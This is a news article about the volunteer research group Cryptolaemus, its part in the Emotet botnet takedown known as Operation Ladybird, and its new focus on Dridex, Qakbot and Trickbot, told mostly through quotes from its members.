The zip attachment contains an xls file: This starts a powershell script, which contacts various URLs and downloads the dll, activating the malware infection chain.
Cryptolaemus now targets Dridex, Qakbot and Trickbot. The cybersecurity group gave a big contribute to defeat the cybercrime Emotet gang, recognized with the Operation Ladybird
Cryptolaemus, the well know cybersecurity group who contributed to defeat the cybercrime Emotet gang, now targets Dridex, Qakbot and Trickbot. The members confirmed adding however that the “old” enemy could not be dead. So they continue also to monitor the evolutions. “The botnets were dismantled from the top down where possible – they explained to Defense and Security -. This means that all tiers of the botnets were controlled by the law enforcement teams and this is how they were getting the updates of the friendly DLL out to all infected bots rendering them also benign. That operation was very impressive to see on a global scale with such cooperation and coordination on all levels of different levels. Truly honored they named it Operation Ladybird! As for if Emotet will come back, this is always a risk but it seems like this takedown was pretty in depth/comprehensive”.
However, the “old” enemy is not dead
However, the Cryptolaemus team is “always watching for Ivan and his family though and there is no doubt it will come back or someone else in the crimeware world will come to fill the need for mass distro for that crime ecosystem. Unfortunately, this seems to be how things work so there will always be a need for researchers to be there to fight at least until the geopolitical situation in Russia changes where criminals are not thriving there. One of our members was mentioning that we should look at it this way on the story of Emotet, ‘where did WE succeed?’. This is very on target with what most of the community is thinking lately. What can we do to make this last as a model for the next battle? We need to reproduce this grass roots effort to fight all the major botnets and have this type of success again and again.”
Who are the “mealybug destroyers”, the Cryptolaemus members
But who are Cryptolaemous guys and why declared war against the malware? “Cryptolaemus was founded in early 2018 as a twitter chat group between half a dozen people to share intel on the latest Emotet campaigns and work closer together – the cybersecurity experts explained -. We felt with all of the tracking we were doing individually that we could be that much better pooling our efforts and sharing the kudos as a team. Since that time, it has evolved into a group of over 24 volunteers spanning many time zones all over the globe. The name comes from the scientific name of a beetle from Australia that is known as the ‘mealybug destroyer’. Symantec had named the actor behind Emotet as “mealybug” and we thought that was a funny name so we became the mealybug destroyers. 🙂 We vote on new members and even have begun to make old members that have moved onto other projects honored as Emeritus status. Some of our members work in Infosec and others work in related fields but have a passion for fighting malware.”
The cybersecurity experts are all volunteers and are not compensated directly for their work against cybercrime
“We are all volunteers and are not compensated directly for our work on Emotet – Cryptolaemus underlined -. We are very grateful for the community’s support and the support of many corporate sponsors. Our goals are to give everyone free and accurate news on Emotet and IoCs to protect themselves. We seek to make everyone aware of the threat that Emotet is and slow down or stymie the growth of the botnets. We feel we have been able to accomplish these goals but Ivan is always trying to get a step ahead so he keeps us on our toes. We all enjoy the fight though and we love to help others so this is why we keep going on as long as the community finds our work valuable. We also have tried to become a focal point on Emotet and consolidate intel to share with the industry and law enforcement. We feel the attention we have received from our efforts proves that we have been successful and performed a valuable service to society!”